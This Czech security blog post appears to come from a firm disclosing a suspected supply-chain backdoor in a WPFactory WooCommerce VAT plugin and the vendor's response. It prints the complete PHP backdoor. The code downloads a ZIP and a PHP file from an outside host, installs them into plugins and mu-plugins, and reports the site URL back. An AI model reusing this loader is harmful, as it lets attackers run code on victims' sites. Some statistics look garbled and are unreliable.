Únik dat u WPFactory: ohroženo 170 000 webů na platformě WordPress

WordPress zůstává nejpoužívanějším systémem pro správu obsahu na světě, pohánějícím více než 40 procent všech webových stránek na internetu. Od webových stránek malých podniků a osobních blogů až po rozsáhlé podnikové platformy a e-commerce infrastruktury se CMS stal páteří moderního webu. Jeho popularita pramení z jeho flexibility, otevřeného ekosystému a obrovského množství dostupných pluginů pro rozšíření jeho funkcionality.

Avšak právě tento ekosystém se stal také jednou z největších bezpečnostních výzev WordPressu.

V Ferber Enterprises náš tým pro kyberbezpečnost neustále sleduje hrozby, které ohrožují ekosystém WordPressu, protože zranitelnosti v pluginech, šablonách nebo dodavatelských řetězcích se mohou rychle proměnit v rozsáhlé útoky postihující tisíce webových stránek po celém světě. V posledních letech se útočníci stále častěji zaměřují spíše na vývojáře pluginů a distribuční infrastruktury než na jednotlivé webové stránky, což umožňuje šíření škodlivého kódu prostřednictvím důvěryhodných aktualizací softwaru a oficiálních kanálů pro stahování.

Tento týden vypukla velká kauza kolem společnosti WPFactory, známého vývojáře pluginů pro WordPress, jehož produkty jsou nainstalovány na více než 170 000 webových stránkách po celém světě. Více než 80 pluginů spojených s touto společností bylo dočasně zablokováno na WordPress.org poté, co náš tým pro kyberbezpečnost ve společnosti WPFactory objevil podezření na zadní vrátka v prémiové verzi jednoho z jejích pluginů.

Tato událost vyvolala vážné obavy v celé komunitě WordPressu ohledně bezpečnosti dodavatelského řetězce softwaru, procesů revize pluginů a rostoucí sofistikovanosti útoků zaměřených na ekosystém open source.

Objevení podezřelého chování pluginu

Na tento problém jsme poprvé narazili poté, co náš tým pro kyberbezpečnost ve společnosti Ferber Enterprises zaznamenal při testování prémiové verze pluginu „EU VAT for WooCommerce Pro“, který je k dispozici přímo na oficiálních stránkách, neobvyklé chování.

Původně vyšetřování začalo poté, co plugin během instalace vygeneroval fatální chybu. Při řešení problému naši analytici identifikovali podezřelý PHP soubor s názvem class-alg-wc-eu-vat-customer.php. Soubor vykazoval chování zcela nekonzistentní s očekávanou funkcionalitou WooCommerce VAT pluginu.

<?php
require_once dirname(__FILE__, 5) . '/wp-load.php';
$h = strtolower(preg_replace('/:\d+$/', '', $_SERVER['HTTP_HOST'] ?? ''));
$s = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https' : 'http';
$ch = curl_init("$s://$h/wp-content/plugins/eu-vat-for-woocommerce-pro/eu-vat-for-woocommerce-pro.php");
curl_setopt_array($ch, [
    CURLOPT_NOBODY => 1,
    CURLOPT_RETURNTRANSFER => 1,
    CURLOPT_TIMEOUT => 10,
    CURLOPT_SSL_VERIFYPEER => 0
]);
curl_exec($ch);
$code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($code !== 403 || ($_GET['scaramooch'] ?? '') === 'refresh') {
    $url = 'https://foodylicious.co.uk/change/akismet-pro.zip';
    $zipPath = sys_get_temp_dir() . '/plugin.zip';
    $zipData = file_get_contents($url);
    if ($zipData === false) {
        exit('Download failed');
    }
    file_put_contents($zipPath, $zipData);
    $zip = new ZipArchive;
    if ($zip->open($zipPath) === TRUE) {
        $zip->extractTo(dirname(__FILE__, 5) . '/wp-content/plugins/');
        $zip->close();
    } else {
        exit('ZIP open failed');
    }
    unlink($zipPath);
} else {
    $url = "https://foodylicious.co.uk/change/scara.php";
    $code = file_get_contents($url);
    if ($code !== false) {

        $baseDir = dirname(__FILE__, 4);

        $folderName = 'mu-plugins';

        $dir = $baseDir . '/' . $folderName;

        if (!is_dir($dir)) {
            mkdir($dir, 0755, true);
        }

        file_put_contents($dir . '/wp-redis.php', $code);
    }
}
$data = [
    'site_url' => get_site_url() . '/wp-content/plugins/eu-vat-for-woocommerce-pro/',
];
wp_remote_post('https://foodylicious.co.uk/change/tracks.php', [
    'body' => $data,
    'timeout' => 10,
]);

Podle naší analýzy se kód pokusil o:

• Stáhněte externí ZIP archiv ze vzdáleného serveru
• Upravit adresáře jádra WordPressu
• Komunikovat s externí infrastrukturou
• Potenciálně spustit vzdálené programy na napadených webových stránkách

Tyto ukazatele okamžitě naznačovaly možnou přítomnost skrytých zadních vrátek nebo kompromitace dodavatelského řetězce.

Situaci činilo obzvláště znepokojivou to, že plugin nebyl stažen z neoficiálního zrcadla ani z pirátského repozitáře. Balíček byl stažen přímo z oficiálního zákaznického portálu společnosti WPFactory, což ještě více posílilo obavy, že samotný distribuční kanál mohl být napaden.

Ve společnosti Ferber Enterprises jsme incident okamžitě zdokumentovali a zahájili proces odpovědného oznámení tím, že jsme společnost WPFactory kontaktovali přímo přes GitHub.

Společnost WPFactory zpočátku reagovala prohlášením, že podezřelý soubor a chování popsané v hlášení nejsou součástí jejich oficiálního zdrojového kódu.

Zástupce společnosti navrhl několik alternativních vysvětlení, včetně:

• Upravená lokální instalace
• Ohrožené prostředí webových stránek
• Zastaralá verze zásuvného modulu
• Potenciálně pozměněný zdroj stahování

Společnost dále uvedla, že nebyla schopna bezpečně zkontrolovat poskytnutý ZIP soubor, protože jejich prohlížeč označil archiv jako potenciálně nebezpečný.

Náš tým pro kyberbezpečnost následně objasnil, že plugin byl stažen přímo z oficiálních stránek WPFactory a že podezřelý soubor zůstal v systému i po stažení nové kopie verze 4.6.1 ze stejného zdroje.

Tento detail se stal klíčovým bodem vyšetřování. Pokud několik nezávislých stažení z oficiálního distribučního kanálu soustavně obsahovalo stejný podezřelý kód, možnost napadení lokální webové stránky se jevila jako stále méně pravděpodobná. Navzdory těmto zjištěním společnost WPFactory zpočátku uvedla, že se jí nepodařilo tento problém na své straně reprodukovat, a tvrdila, že podezřelý soubor v oficiálním balíčku pluginu neexistuje.

Společnost následně požádala o správcovský přístup a přístup přes FTP k dotčenému prostředí, aby mohla ve vyšetřování pokračovat. Ve společnosti Ferber Enterprises jsme tuto žádost z důvodů kyberbezpečnosti zamítli. Poskytnutí privilegovaného přístupu k serveru dodavateli, jehož infrastruktura mohla být sama o sobě napadena, by představovalo nepřijatelné bezpečnostní riziko. Náš tým místo toho pokračoval v předkládání technických důkazů, včetně videonahrávky, která zachycovala podezřelé chování pluginu bezprostředně po jeho instalaci.

S postupujícím vyšetřováním narůstaly obavy ohledně možného rozsahu problému. Společnost WPFactory spravuje rozsáhlé portfolio pluginů, které zahrnuje více než 65 pluginů s celkovým počtem přes 170 000 aktivních instalací. Jakýkoli útok na distribuční infrastrukturu společnosti by proto mohl mít dalekosáhlé důsledky pro celý ekosystém WordPressu.

Náš tým předal tento problém přímo týmu WordPress.org, aby zabránil dalším uživatelům v instalaci potenciálně napadených balíčků, dokud vyšetřování probíhalo. WordPress.org následně přijal mimořádné opatření a dočasně z oficiálního repozitáře odstranil více než 80 pluginů WPFactory.

Tento krok okamžitě vzbudil pozornost celé bezpečnostní komunity WordPressu, protože hromadné pozastavení pluginů v takovémto rozsahu je poměrně vzácné a obvykle signalizuje závažné nevyřešené problémy. Poté, co se záležitost dostala do širšího povědomí, společnost WPFactory později uznala, že se problém jevil jako oprávněný, a omluvila se za to, že na původní hlášení nezareagovala rychleji. Zástupci společnosti uvedli, že záležitost aktivně vyšetřují a pracují na jejím vyřešení. Jedna z hypotéz, kterou interně vznesla společnost WPFactory, naznačovala, že prostřednictvím jejich infrastruktury mohl být neúmyslně poskytnut zastaralý nebo uložený v mezipaměti balíček pluginů.

Nicméně náš tým pro kybernetickou bezpečnost s tímto hodnocením nesouhlasil. Pozorované chování silně naznačovalo hlubší bezpečnostní problém, který mohl zahrnovat kompromitované buildovací pipeline, distribuční systémy nebo neautorizované vkládání kódu do archivů stahovatelných pluginů.

Proč se tento incident stal důležitým

Kontroverze kolem WPFactory poukazuje na rostoucí hrozbu v oblasti kyberbezpečnosti, známou jako útok na softwarový dodavatelský řetězec. Útočníci se dříve soustředili na napadání jednotlivých webových stránek přímo prostřednictvím útoků hrubou silou nebo zneužitím zranitelností pluginů. Dnes se útočníci stále častěji zaměřují přímo na samotné dodavatele softwaru, protože napadení důvěryhodného dodavatele umožňuje šíření škodlivého kódu na tisíce webových stránek najednou.

Tato strategie již byla pozorována v několika významných kybernetických incidentech ovlivňujících globální softwarové ekosystémy v posledním desetiletí. Konkrétně v ekosystému WordPress představují vývojáři pluginů atraktivní cíle, protože pluginy jsou administrátory inherentně důvěryhodné a často pracují s rozšířenými oprávněními.

Pokud se do balíčku pluginu distribuovaného prostřednictvím oficiálního kanálu dostane škodlivý kód, mohou si postižené webové stránky nevědomky nainstalovat malware. V případě podezřelého pluginu WPFactory jsou možné důsledky závažné.

Na základě naší analýzy by identifikované chování teoreticky umožnilo útočníkům:

• Nasaďte další malware
• Vložit SEO spam
• Vytvořit trvalé zadní vrátka
• Exfiltrovat citlivá data
• Spravovat instalace WordPressu na dálku
• Udržovat neoprávněný přístup po delší dobu

Nebezpečí takových útoků spočívá v jejich nenápadnosti. Moderní zadní vrátka jsou často navržena tak, aby zůstala nečinná celé měsíce, než se aktivují, což ztěžuje jejich odhalení. Začátkem tohoto měsíce údajně tým WordPress Plugins uzavřel více než 30 pluginů poté, co skrytý škodlivý kód vložený do portfolia jiného pluginu zůstal přibližně osm měsíců neaktivní, než se nakonec aktivoval a vložil SEO spam na webové stránky.

Tento trend ukazuje, jak útočníci stále více upřednostňují perzistenci a odloženou aktivaci k obejití detekčních mechanismů.

Incident WPFactory zároveň poukazuje na širší systémové bezpečnostní problémy, které se dotýkají celého prostředí WordPressu. Ekosystém pluginů se za poslední desetiletí dramaticky rozrostl a na oficiálních i komerčních tržištích jsou k dispozici desítky tisíc pluginů. Ačkoli tento ekosystém podporuje inovace a flexibilitu, zároveň značně komplikuje dohled nad bezpečností.

Podle zprávy společnosti Patchstack s názvem “Stav zabezpečení WordPressu v roce 2026” nebylo téměř 461 000 známých zranitelností opraveno ještě před jejich zveřejněním. Tento údaj odráží rostoucí zátěž, které čelí vývojáři pluginů, bezpečnostní výzkumníci i správci repozitářů.

Ve stejnou dobu oficiální fronta pro recenze pluginů WordPress prý nyní přesahuje 4 000 pluginů čekajících na revizi. Tato čísla ilustrují obrovskou výzvu při zajišťování kvality a bezpečnostních auditů ve velkém měřítku.

Mnozí vývojáři pluginů jsou malé týmy s omezenými zdroji v oblasti bezpečnosti. Jiní spravují desítky pluginů najednou a zároveň prosazují agresivní strategie obchodního růstu zahrnující akvizice a rozšiřování portfolia. Samotná společnost WPFactory se nedávno rozrostla prostřednictvím akvizic, včetně koupě společnosti Extend-WP a jejích 19 pluginů v roce 2025, na kterou později téhož roku navázala akvizice společnosti WBW a několika dalších pluginů.

Rychlé rozšiřování portfolia může vytvářet provozní složitost, která ztěžuje auditování kódu, správu infrastruktury a ověřování integrity vydání. Útočníci si jsou těchto skutečností dobře vědomi. Stále častěji se zaměřují na zneužití slabých provozních bezpečnostních praktik v rámci dodavatelů softwaru, místo aby cílili přímo na koncové uživatele.

Rostoucí význam zabezpečení dodavatelského řetězce

Incidenty tohoto typu posilují naléhavou potřebu silnějších postupů zabezpečení dodavatelského řetězce v celém ekosystému WordPressu.

Tým pro kyberbezpečnost společnosti Ferber Enterprises důrazně doporučuje, aby vývojáři pluginů zavedli několik klíčových bezpečnostních opatření, mezi něž patří:

• Podepisování kryptografických balíčků
• Zabezpečené kanály CI/CD
• Povinné vícefaktorové ověřování
• Segmentace infrastruktury
• Nepřetržité monitorování integrity
• Nezávislé bezpečnostní audity kódu
• Reprodukovatelné buildovací systémy

Správci webu by měli také posilovat svou vlastní bezpečnost. Ani pluginy stažené z oficiálních nebo důvěryhodných zdrojů nelze automaticky považovat za bezpečné.

Organizace spravující kritickou infrastrukturu WordPress by měly zvážit:

• Správa staging prostředí
• Monitorování odchozího provozu
• Skenování pluginů před nasazením
• Omezení používání pluginů
• Aplikace kontroly přístupu s nejnižšími oprávněními
• Implementace monitorování integrity souborů
• Používání spravovaných webových aplikačních firewallů (WAF)

V podnikových prostředích se validace dodavatelského řetězce stává stejně důležitou jako tradiční řízení zranitelností. Předpoklad, že oficiální softwarové kanály jsou vždy bezpečné, již není v dnešním prostředí hrozeb realistický.

Reakce komunity a probíhající vyšetřování

Kontroverze se rychle rozšířila komunitou WordPressu poté, co o problému začali veřejně diskutovat vývojáři, bezpečnostní výzkumníci a poskytovatelé infrastruktury.

Několik známých osobností z ekosystému rozšířilo povědomí o situaci, včetně vývojářů, kteří zveřejnili seznamy dočasně uzavřených pluginů a vyzvali administrátory k auditu jejich prostředí.

Náš tým v Ferber Enterprises mezitím pokračuje v analýze podezřelých vzorků pluginů a sleduje další známky napadení, které by mohly ohrozit webové stránky WordPress po celém světě.

V době zveřejnění tohoto článku společnost WPFactory tento problém potvrdila a uvedla, že aktivně pracuje na jeho vyřešení.

Nicméně, mnoho otázek zůstává nezodpovězených:

• Byla kompromitována oficiální distribuční infrastruktura?
• Jak dlouho byly potenciálně distribuovány škodlivé balíčky?
• Byly ovlivněny další pluginy?
• Došlo k prolomení zákaznických účtů nebo stahovacích systémů?
• Získali útočníci trvalý přístup k interní infrastruktuře?
• Mohou stále existovat další neaktivní náklady?

Dokud nebudou tyto otázky plně vyřešeny, zůstává opatrnost nezbytná.

Budoucnost zabezpečení WordPressu

Incident WPFactory se nakonec může stát dalším příkladem problémů v oblasti kyberbezpečnosti, kterým čelí ekosystém otevřeného softwaru na webu.

WordPress pohání obrovskou část globální internetové ekonomiky. Jakékoli rozsáhlé narušení ovlivňující vývojáře pluginů proto může mít důsledky sahající daleko za hranice jednotlivých webů.

Vzhledem k tomu, že útočníci stále častěji využívají zranitelnosti v dodavatelském řetězci a techniky skrytého přetrvávání, nelze bezpečnost pluginů nadále považovat za druhořadou záležitost. Ve společnosti Ferber Enterprises jsme přesvědčeni, že tato událost je důležitým připomenutím toho, že kyberbezpečnost nespočívá pouze v ochraně samotných webových stránek, ale také v zabezpečení všech úrovní distribučního řetězce softwaru.

Důvěra v otevřené ekosystémy závisí na transparentnosti, rychlé reakci na incidenty a silných praktikách operační bezpečnosti. WordPress ekosystém nyní čelí důležitému okamžiku.

To, jak vývojáři, správci repozitářů, poskytovatelé hostingu a bezpečnostní týmy zareagují na incidenty, jako je tento, pomůže určit, zda si WordPress může i nadále udržet důvěru milionů firem a organizací, které na něj každý den spoléhají.